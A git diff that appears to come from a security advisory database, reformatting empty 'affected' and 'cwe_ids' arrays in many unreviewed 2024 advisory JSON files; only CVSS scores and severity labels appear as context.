b/advisories/unreviewed/2024/10/GHSA-q2x4-35qf-p4qw/GHSA-q2x4-35qf-p4qw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -59,9 +57,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-q63q-pqgx-268p/GHSA-q63q-pqgx-268p.json b/advisories/unreviewed/2024/10/GHSA-q63q-pqgx-268p/GHSA-q63q-pqgx-268p.json index c7be9e1566f..8236bf91f26 100644 --- a/advisories/unreviewed/2024/10/GHSA-q63q-pqgx-268p/GHSA-q63q-pqgx-268p.json +++ b/advisories/unreviewed/2024/10/GHSA-q63q-pqgx-268p/GHSA-q63q-pqgx-268p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-r9vf-qqqr-747x/GHSA-r9vf-qqqr-747x.json b/advisories/unreviewed/2024/10/GHSA-r9vf-qqqr-747x/GHSA-r9vf-qqqr-747x.json index 823a4adc09c..61475c1e05e 100644 --- a/advisories/unreviewed/2024/10/GHSA-r9vf-qqqr-747x/GHSA-r9vf-qqqr-747x.json +++ b/advisories/unreviewed/2024/10/GHSA-r9vf-qqqr-747x/GHSA-r9vf-qqqr-747x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-rrh5-rfhq-mff2/GHSA-rrh5-rfhq-mff2.json b/advisories/unreviewed/2024/10/GHSA-rrh5-rfhq-mff2/GHSA-rrh5-rfhq-mff2.json index 00dcc593317..4ee383fd774 100644 --- a/advisories/unreviewed/2024/10/GHSA-rrh5-rfhq-mff2/GHSA-rrh5-rfhq-mff2.json +++ b/advisories/unreviewed/2024/10/GHSA-rrh5-rfhq-mff2/GHSA-rrh5-rfhq-mff2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-v3gq-vrpv-476w/GHSA-v3gq-vrpv-476w.json b/advisories/unreviewed/2024/10/GHSA-v3gq-vrpv-476w/GHSA-v3gq-vrpv-476w.json index 5a66bc9adee..29d3cedf8cf 100644 --- a/advisories/unreviewed/2024/10/GHSA-v3gq-vrpv-476w/GHSA-v3gq-vrpv-476w.json +++ b/advisories/unreviewed/2024/10/GHSA-v3gq-vrpv-476w/GHSA-v3gq-vrpv-476w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-v3jw-p9pj-m453/GHSA-v3jw-p9pj-m453.json b/advisories/unreviewed/2024/10/GHSA-v3jw-p9pj-m453/GHSA-v3jw-p9pj-m453.json index b043296897b..8c03724420f 100644 --- a/advisories/unreviewed/2024/10/GHSA-v3jw-p9pj-m453/GHSA-v3jw-p9pj-m453.json +++ b/advisories/unreviewed/2024/10/GHSA-v3jw-p9pj-m453/GHSA-v3jw-p9pj-m453.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-vg8g-7jgx-v9fv/GHSA-vg8g-7jgx-v9fv.json b/advisories/unreviewed/2024/10/GHSA-vg8g-7jgx-v9fv/GHSA-vg8g-7jgx-v9fv.json index 994f8d8d2f6..6e4b64f49d7 100644 --- a/advisories/unreviewed/2024/10/GHSA-vg8g-7jgx-v9fv/GHSA-vg8g-7jgx-v9fv.json +++ b/advisories/unreviewed/2024/10/GHSA-vg8g-7jgx-v9fv/GHSA-vg8g-7jgx-v9fv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-w7r5-57r3-mcrc/GHSA-w7r5-57r3-mcrc.json b/advisories/unreviewed/2024/10/GHSA-w7r5-57r3-mcrc/GHSA-w7r5-57r3-mcrc.json index 3a1c90e700b..6ba83ba1c19 100644 --- a/advisories/unreviewed/2024/10/GHSA-w7r5-57r3-mcrc/GHSA-w7r5-57r3-mcrc.json +++ b/advisories/unreviewed/2024/10/GHSA-w7r5-57r3-mcrc/GHSA-w7r5-57r3-mcrc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-xvhx-jwjw-g589/GHSA-xvhx-jwjw-g589.json b/advisories/unreviewed/2024/10/GHSA-xvhx-jwjw-g589/GHSA-xvhx-jwjw-g589.json index e748009c77e..15853441dca 100644 --- a/advisories/unreviewed/2024/10/GHSA-xvhx-jwjw-g589/GHSA-xvhx-jwjw-g589.json +++ b/advisories/unreviewed/2024/10/GHSA-xvhx-jwjw-g589/GHSA-xvhx-jwjw-g589.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-266r-h4p4-f6fp/GHSA-266r-h4p4-f6fp.json b/advisories/unreviewed/2024/11/GHSA-266r-h4p4-f6fp/GHSA-266r-h4p4-f6fp.json index 4c66c40f632..62703ef9126 100644 --- a/advisories/unreviewed/2024/11/GHSA-266r-h4p4-f6fp/GHSA-266r-h4p4-f6fp.json +++ b/advisories/unreviewed/2024/11/GHSA-266r-h4p4-f6fp/GHSA-266r-h4p4-f6fp.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-2742-r3c2-2qgj/GHSA-2742-r3c2-2qgj.json b/advisories/unreviewed/2024/11/GHSA-2742-r3c2-2qgj/GHSA-2742-r3c2-2qgj.json index c968c903d77..cb5bf248524 100644 --- a/advisories/unreviewed/2024/11/GHSA-2742-r3c2-2qgj/GHSA-2742-r3c2-2qgj.json +++ b/advisories/unreviewed/2024/11/GHSA-2742-r3c2-2qgj/GHSA-2742-r3c2-2qgj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-28gw-7mxx-5hjg/GHSA-28gw-7mxx-5hjg.json b/advisories/unreviewed/2024/11/GHSA-28gw-7mxx-5hjg/GHSA-28gw-7mxx-5hjg.json index d024f347750..d6b92640e22 100644 --- a/advisories/unreviewed/2024/11/GHSA-28gw-7mxx-5hjg/GHSA-28gw-7mxx-5hjg.json +++ b/advisories/unreviewed/2024/11/GHSA-28gw-7mxx-5hjg/GHSA-28gw-7mxx-5hjg.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-2f2h-73pp-4p79/GHSA-2f2h-73pp-4p79.json b/advisories/unreviewed/2024/11/GHSA-2f2h-73pp-4p79/GHSA-2f2h-73pp-4p79.json index 2055303038d..942c876c001 100644 --- a/advisories/unreviewed/2024/11/GHSA-2f2h-73pp-4p79/GHSA-2f2h-73pp-4p79.json +++ b/advisories/unreviewed/2024/11/GHSA-2f2h-73pp-4p79/GHSA-2f2h-73pp-4p79.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-2m7j-4ff8-h52q/GHSA-2m7j-4ff8-h52q.json b/advisories/unreviewed/2024/11/GHSA-2m7j-4ff8-h52q/GHSA-2m7j-4ff8-h52q.json index 61a1d51d303..86cc8b5b529 100644 --- a/advisories/unreviewed/2024/11/GHSA-2m7j-4ff8-h52q/GHSA-2m7j-4ff8-h52q.json +++ b/advisories/unreviewed/2024/11/GHSA-2m7j-4ff8-h52q/GHSA-2m7j-4ff8-h52q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-2q4g-wvwx-8q3w/GHSA-2q4g-wvwx-8q3w.json b/advisories/unreviewed/2024/11/GHSA-2q4g-wvwx-8q3w/GHSA-2q4g-wvwx-8q3w.json index 413c373b844..4216707f69a 100644 --- a/advisories/unreviewed/2024/11/GHSA-2q4g-wvwx-8q3w/GHSA-2q4g-wvwx-8q3w.json +++ b/advisories/unreviewed/2024/11/GHSA-2q4g-wvwx-8q3w/GHSA-2q4g-wvwx-8q3w.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-2r7c-gmrp-mxwv/GHSA-2r7c-gmrp-mxwv.json b/advisories/unreviewed/2024/11/GHSA-2r7c-gmrp-mxwv/GHSA-2r7c-gmrp-mxwv.json index d371c336c1a..47159eab1c8 100644 --- a/advisories/unreviewed/2024/11/GHSA-2r7c-gmrp-mxwv/GHSA-2r7c-gmrp-mxwv.json +++ b/advisories/unreviewed/2024/11/GHSA-2r7c-gmrp-mxwv/GHSA-2r7c-gmrp-mxwv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-2v5c-72gh-q5f7/GHSA-2v5c-72gh-q5f7.json b/advisories/unreviewed/2024/11/GHSA-2v5c-72gh-q5f7/GHSA-2v5c-72gh-q5f7.json index 667236cb8c1..18138d926d2 100644 --- a/advisories/unreviewed/2024/11/GHSA-2v5c-72gh-q5f7/GHSA-2v5c-72gh-q5f7.json +++ b/advisories/unreviewed/2024/11/GHSA-2v5c-72gh-q5f7/GHSA-2v5c-72gh-q5f7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-2x4x-xw83-gw6x/GHSA-2x4x-xw83-gw6x.json b/advisories/unreviewed/2024/11/GHSA-2x4x-xw83-gw6x/GHSA-2x4x-xw83-gw6x.json index 27deb92e72b..234da5cbc82 100644 --- a/advisories/unreviewed/2024/11/GHSA-2x4x-xw83-gw6x/GHSA-2x4x-xw83-gw6x.json +++ b/advisories/unreviewed/2024/11/GHSA-2x4x-xw83-gw6x/GHSA-2x4x-xw83-gw6x.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-334h-vcfc-hw2v/GHSA-334h-vcfc-hw2v.json b/advisories/unreviewed/2024/11/GHSA-334h-vcfc-hw2v/GHSA-334h-vcfc-hw2v.json index 905e511991a..0b7cdce2bf6 100644 --- a/advisories/unreviewed/2024/11/GHSA-334h-vcfc-hw2v/GHSA-334h-vcfc-hw2v.json +++ b/advisories/unreviewed/2024/11/GHSA-334h-vcfc-hw2v/GHSA-334h-vcfc-hw2v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-33mv-fjxj-2mx6/GHSA-33mv-fjxj-2mx6.json b/advisories/unreviewed/2024/11/GHSA-33mv-fjxj-2mx6/GHSA-33mv-fjxj-2mx6.json index b7e32266997..cd69fddf55c 100644 --- a/advisories/unreviewed/2024/11/GHSA-33mv-fjxj-2mx6/GHSA-33mv-fjxj-2mx6.json +++ b/advisories/unreviewed/2024/11/GHSA-33mv-fjxj-2mx6/GHSA-33mv-fjxj-2mx6.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-349p-cc4x-9fv4/GHSA-349p-cc4x-9fv4.json b/advisories/unreviewed/2024/11/GHSA-349p-cc4x-9fv4/GHSA-349p-cc4x-9fv4.json index 87e6bcdb33c..8fa8d670351 100644 --- a/advisories/unreviewed/2024/11/GHSA-349p-cc4x-9fv4/GHSA-349p-cc4x-9fv4.json +++ b/advisories/unreviewed/2024/11/GHSA-349p-cc4x-9fv4/GHSA-349p-cc4x-9fv4.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-34p7-67p6-m2pf/GHSA-34p7-67p6-m2pf.json b/advisories/unreviewed/2024/11/GHSA-34p7-67p6-m2pf/GHSA-34p7-67p6-m2pf.json index c12e27c3ae0..3510db8ab50 100644 --- a/advisories/unreviewed/2024/11/GHSA-34p7-67p6-m2pf/GHSA-34p7-67p6-m2pf.json +++ b/advisories/unreviewed/2024/11/GHSA-34p7-67p6-m2pf/GHSA-34p7-67p6-m2pf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-34x9-8896-59v6/GHSA-34x9-8896-59v6.json b/advisories/unreviewed/2024/11/GHSA-34x9-8896-59v6/GHSA-34x9-8896-59v6.json index 4d770489f39..d67ccb0c9bd 100644 --- a/advisories/unreviewed/2024/11/GHSA-34x9-8896-59v6/GHSA-34x9-8896-59v6.json +++ b/advisories/unreviewed/2024/11/GHSA-34x9-8896-59v6/GHSA-34x9-8896-59v6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-38jp-8r92-cqg4/GHSA-38jp-8r92-cqg4.json b/advisories/unreviewed/2024/11/GHSA-38jp-8r92-cqg4/GHSA-38jp-8r92-cqg4.json index d2a4d1a0d81..3f4ac8b4850 100644 --- a/advisories/unreviewed/2024/11/GHSA-38jp-8r92-cqg4/GHSA-38jp-8r92-cqg4.json +++ b/advisories/unreviewed/2024/11/GHSA-38jp-8r92-cqg4/GHSA-38jp-8r92-cqg4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-39h6-pqr3-34cv/GHSA-39h6-pqr3-34cv.json b/advisories/unreviewed/2024/11/GHSA-39h6-pqr3-34cv/GHSA-39h6-pqr3-34cv.json index 7d27f14269f..5dd4dacb5b2 100644 --- a/advisories/unreviewed/2024/11/GHSA-39h6-pqr3-34cv/GHSA-39h6-pqr3-34cv.json +++ b/advisories/unreviewed/2024/11/GHSA-39h6-pqr3-34cv/GHSA-39h6-pqr3-34cv.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-39p9-vqpx-2vp6/GHSA-39p9-vqpx-2vp6.json b/advisories/unreviewed/2024/11/GHSA-39p9-vqpx-2vp6/GHSA-39p9-vqpx-2vp6.json index 5457a921135..c0df63203f4 100644 --- a/advisories/unreviewed/2024/11/GHSA-39p9-vqpx-2vp6/GHSA-39p9-vqpx-2vp6.json +++ b/advisories/unreviewed/2024/11/GHSA-39p9-vqpx-2vp6/GHSA-39p9-vqpx-2vp6.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-3c94-ghvc-4j26/GHSA-3c94-ghvc-4j26.json b/advisories/unreviewed/2024/11/GHSA-3c94-ghvc-4j26/GHSA-3c94-ghvc-4j26.json index 40468efb2e8..5e46e8d904d 100644 --- a/advisories/unreviewed/2024/11/GHSA-3c94-ghvc-4j26/GHSA-3c94-ghvc-4j26.json +++ b/advisories/unreviewed/2024/11/GHSA-3c94-ghvc-4j26/GHSA-3c94-ghvc-4j26.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-3mcq-hpvx-hp2v/GHSA-3mcq-hpvx-hp2v.json b/advisories/unreviewed/2024/11/GHSA-3mcq-hpvx-hp2v/GHSA-3mcq-hpvx-hp2v.json index 5031312d7a2..01915e3fd59 100644 --- a/advisories/unreviewed/2024/11/GHSA-3mcq-hpvx-hp2v/GHSA-3mcq-hpvx-hp2v.json +++ b/advisories/unreviewed/2024/11/GHSA-3mcq-hpvx-hp2v/GHSA-3mcq-hpvx-hp2v.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-3prf-xhv6-xgm8/GHSA-3prf-xhv6-xgm8.json b/advisories/unreviewed/2024/11/GHSA-3prf-xhv6-xgm8/GHSA-3prf-xhv6-xgm8.json index be3f152b644..31a97e1c015 100644 --- a/advisories/unreviewed/2024/11/GHSA-3prf-xhv6-xgm8/GHSA-3prf-xhv6-xgm8.json +++ b/advisories/unreviewed/2024/11/GHSA-3prf-xhv6-xgm8/GHSA-3prf-xhv6-xgm8.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-3v6p-5g46-w432/GHSA-3v6p-5g46-w432.json b/advisories/unreviewed/2024/11/GHSA-3v6p-5g46-w432/GHSA-3v6p-5g46-w432.json index 2c971ef1265..e110e1a72ff 100644 --- a/advisories/unreviewed/2024/11/GHSA-3v6p-5g46-w432/GHSA-3v6p-5g46-w432.json +++ b/advisories/unreviewed/2024/11/GHSA-3v6p-5g46-w432/GHSA-3v6p-5g46-w432.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-3wr4-2chq-phgj/GHSA-3wr4-2chq-phgj.json b/advisories/unreviewed/2024/11/GHSA-3wr4-2chq-phgj/GHSA-3wr4-2chq-phgj.json index 833af9c80b0..d73d17a0271 100644 --- a/advisories/unreviewed/2024/11/GHSA-3wr4-2chq-phgj/GHSA-3wr4-2chq-phgj.json +++ b/advisories/unreviewed/2024/11/GHSA-3wr4-2chq-phgj/GHSA-3wr4-2chq-phgj.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:A/V:C/RE:M/U:Red" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-3x82-hxvx-2rv2/GHSA-3x82-hxvx-2rv2.json b/advisories/unreviewed/2024/11/GHSA-3x82-hxvx-2rv2/GHSA-3x82-hxvx-2rv2.json index be0c289fc3e..0967b174aca 100644 --- a/advisories/unreviewed/2024/11/GHSA-3x82-hxvx-2rv2/GHSA-3x82-hxvx-2rv2.json +++ b/advisories/unreviewed/2024/11/GHSA-3x82-hxvx-2rv2/GHSA-3x82-hxvx-2rv2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-3x8x-wg7p-5gq4/GHSA-3x8x-wg7p-5gq4.json b/advisories/unreviewed/2024/11/GHSA-3x8x-wg7p-5gq4/GHSA-3x8x-wg7p-5gq4.json index d286d6156f6..933956e0a07 100644 --- a/advisories/unreviewed/2024/11/GHSA-3x8x-wg7p-5gq4/GHSA-3x8x-wg7p-5gq4.json +++ b/advisories/unreviewed/2024/11/GHSA-3x8x-wg7p-5gq4/GHSA-3x8x-wg7p-5gq4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-3xc2-jvpw-rv79/GHSA-3xc2-jvpw-rv79.json b/advisories/unreviewed/2024/11/GHSA-3xc2-jvpw-rv79/GHSA-3xc2-jvpw-rv79.json index 33f128d46a5..ca66550a41a 100644 --- a/advisories/unreviewed/2024/11/GHSA-3xc2-jvpw-rv79/GHSA-3xc2-jvpw-rv79.json +++ b/advisories/unreviewed/2024/11/GHSA-3xc2-jvpw-rv79/GHSA-3xc2-jvpw-rv79.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-3xg4-jv8r-rx3h/GHSA-3xg4-jv8r-rx3h.json b/advisories/unreviewed/2024/11/GHSA-3xg4-jv8r-rx3h/GHSA-3xg4-jv8r-rx3h.json index f0bbd6f8e43..f5a79259664 100644 --- a/advisories/unreviewed/2024/11/GHSA-3xg4-jv8r-rx3h/GHSA-3xg4-jv8r-rx3h.json +++ b/advisories/unreviewed/2024/11/GHSA-3xg4-jv8r-rx3h/GHSA-3xg4-jv8r-rx3h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-4225-4fvr-rghw/GHSA-4225-4fvr-rghw.json b/advisories/unreviewed/2024/11/GHSA-4225-4fvr-rghw/GHSA-4225-4fvr-rghw.json index 23320ca99d3..f3f96fb1830 100644 --- a/advisories/unreviewed/2024/11/GHSA-4225-4fvr-rghw/GHSA-4225-4fvr-rghw.json +++ b/advisories/unreviewed/2024/11/GHSA-4225-4fvr-rghw/GHSA-4225-4fvr-rghw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-45w9-p29f-hp8r/GHSA-45w9-p29f-hp8r.json b/advisories/unreviewed/2024/11/GHSA-45w9-p29f-hp8r/GHSA-45w9-p29f-hp8r.json index cc2d4261494..843aee79f10 100644 --- a/advisories/unreviewed/2024/11/GHSA-45w9-p29f-hp8r/GHSA-45w9-p29f-hp8r.json +++ 